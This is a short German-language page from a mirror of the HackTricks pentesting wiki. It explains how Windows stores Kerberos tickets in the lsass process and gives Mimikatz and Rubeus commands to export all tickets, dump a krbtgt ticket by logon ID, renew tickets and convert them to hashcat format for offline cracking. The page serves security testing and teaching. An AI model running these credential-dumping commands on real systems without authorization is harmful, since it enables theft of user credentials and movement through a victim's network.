maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md

42 lines
2.2 KiB
Markdown
Raw Blame History

# Harvesting tickets from Windows
{{#include ../../banners/hacktricks-training.md}}
Tickets in Windows werden vom **lsass** (Local Security Authority Subsystem Service) Prozess verwaltet und gespeichert, der für die Handhabung von Sicherheitsrichtlinien verantwortlich ist. Um diese Tickets zu extrahieren, ist es notwendig, mit dem lsass-Prozess zu interagieren. Ein nicht-administrativer Benutzer kann nur auf seine eigenen Tickets zugreifen, während ein Administrator das Privileg hat, alle Tickets im System zu extrahieren. Für solche Operationen werden die Tools **Mimikatz** und **Rubeus** häufig eingesetzt, die jeweils unterschiedliche Befehle und Funktionen bieten.
### Mimikatz
Mimikatz ist ein vielseitiges Tool, das mit der Windows-Sicherheit interagieren kann. Es wird nicht nur zum Extrahieren von Tickets verwendet, sondern auch für verschiedene andere sicherheitsbezogene Operationen.
```bash
# Extracting tickets using Mimikatz
sekurlsa::tickets /export
```
### Rubeus
Rubeus ist ein Tool, das speziell für die Interaktion und Manipulation von Kerberos entwickelt wurde. Es wird für die Ticketextraktion und -verarbeitung sowie für andere Kerberos-bezogene Aktivitäten verwendet.
```bash
# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
# Listing all tickets
.\Rubeus.exe triage
# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>
# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>
```
Beim Verwenden dieser Befehle stellen Sie sicher, dass Sie Platzhalter wie `<BASE64_TICKET>` und `<luid>` durch das tatsächliche Base64-kodierte Ticket und die Logon-ID ersetzen. Diese Tools bieten umfangreiche Funktionen zur Verwaltung von Tickets und zur Interaktion mit den Sicherheitsmechanismen von Windows.
## References
- [https://www.tarlogic.com/en/blog/how-to-attack-kerberos/](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink